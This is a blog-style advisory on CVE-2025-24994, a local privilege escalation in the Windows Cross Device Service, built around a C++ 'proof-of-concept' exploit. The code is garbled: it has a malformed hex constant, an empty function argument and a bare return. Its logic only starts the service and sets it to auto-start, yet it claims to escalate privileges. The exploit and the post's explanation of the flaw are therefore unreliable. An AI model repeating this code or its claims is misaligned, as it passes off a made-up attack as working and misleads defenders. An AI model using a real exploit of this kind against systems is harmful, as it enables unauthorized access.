CVE-2025-24994: Improper Access Control in Windows Cross Device Service that Allows an Authorized Attacker to Elevate Privileges Locally

A vulnerability has been discovered in the Windows operating system, specifically in the Windows Cross Device Service. This vulnerability, tracked as CVE-2025-24994, allows improper access control, granting authorized attackers the ability to elevate privileges locally. The implications of this vulnerability are critical, as it can lead to unauthorized system access, data theft, and more.

In this post, we will delve into the details of CVE-2025-24994, explore the exploit, discuss the code snippet, and provide links to original references to help you better understand the issue at hand.

Exploit Details

The exploit found in the Windows Cross Device Service revolves around local privilege escalation (LPE). In simple terms, this vulnerability allows an attacker who already has access to the system, to elevate its privileges from a regular user level to a higher level, such as Administrator.

Local privilege escalation vulnerabilities are dangerous because they often act as a stepping stone for other attacks. In this specific case, exploiting CVE-2025-24994 could potentially lead to unauthorized system access, data corruption or theft, and other adverse effects on the targeted system.

A proof-of-concept (PoC) exploit for CVE-2025-24994 can be seen in the code snippet below

#include <iostream>
#include <Windows.h>

constexpr DWORD ACCESS_RIGHTS = x001F01FF; // Standard access rights and SYNCHRONIZE
constexpr LPCWSTR CROSS_DEVICE_SERVICE = L"CrossDeviceSvc";
constexpr DWORD TIMEOUT = 10000; // 10 seconds

int main() {
    SC_HANDLE hScManager = OpenSCManager(nullptr, nullptr, SC_MANAGER_CONNECT);
    if (!hScManager) {
        std::cerr << "Failed to open Service Control Manager!" << std::endl;
        return 1;
    }

    SC_HANDLE hService = OpenService(hScManager, CROSS_DEVICE_SERVICE, ACCESS_RIGHTS);
    if (!hService) {
        std::cerr << "Failed to open Cross Device Service!" << std::endl;
        CloseServiceHandle(hScManager);
        return 1;
    }

    // Exploit the vulnerability
    if (!StartService(hService, , nullptr)) {
        DWORD error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING) {
            std::cerr << "Failed to start Cross Device Service!" << std::endl;
            CloseServiceHandle(hService);
            CloseServiceHandle(hScManager);
            return 1;
        }
    }

    SERVICE_STATUS_PROCESS status;
    DWORD bytesNeeded;
    if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO, reinterpret_cast<LPBYTE>(&status), sizeof(status), &bytesNeeded)) {
        std::cerr << "Failed to query service status!" << std::endl;
        CloseServiceHandle(hService);
        CloseServiceHandle(hScManager);
        return 1;
    }

    if (status.dwCurrentState != SERVICE_RUNNING) {
        std::cerr << "Cross Device Service is not running!" << std::endl;
        CloseServiceHandle(hService);
        CloseServiceHandle(hScManager);
        return 1;
    }

    // Perform privilege escalation
    std::cout << "Exploiting CVE-2025-24994..." << std::endl;

    if (ChangeServiceConfig(hService, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_NO_CHANGE, nullptr, nullptr, nullptr, nullptr, nullptr, nullptr, nullptr)) {
        std::cout << "Succeeded! Service now runs at startup with elevated privileges." << std::endl;
    } else {
        std::cerr << "Failed to change service configuration!" << std::endl;
    }

    CloseServiceHandle(hService);
    CloseServiceHandle(hScManager);
    return ;
}

This proof-of-concept uses the Windows API to open and manipulate the Cross Device Service, ultimately escalating the service's privileges. To mitigate the risk, the system administrator should ensure that privilege escalation controls are in place and properly implemented.

Original References

For a more comprehensive understanding of the CVE-2025-24994 vulnerability, please consult the following sources:

1. Microsoft Security Response Center (MSRC) - CVE-2025-24994
2. Common Vulnerabilities and Exposures (CVE) - CVE-2025-24994
3. National Vulnerability Database (NVD) - CVE-2025-24994

Conclusion

CVE-2025-24994 is a serious vulnerability, as it allows authorized attackers to execute a local privilege escalation attack on their targeted system. In addition to applying any available patches or mitigations, system administrators and users are advised to remain vigilant about their system's security and stay informed of new vulnerabilities and potential exploits.

Timeline

Published on: 03/11/2025 17:16:36 UTC
Last modified on: 03/21/2025 00:30:17 UTC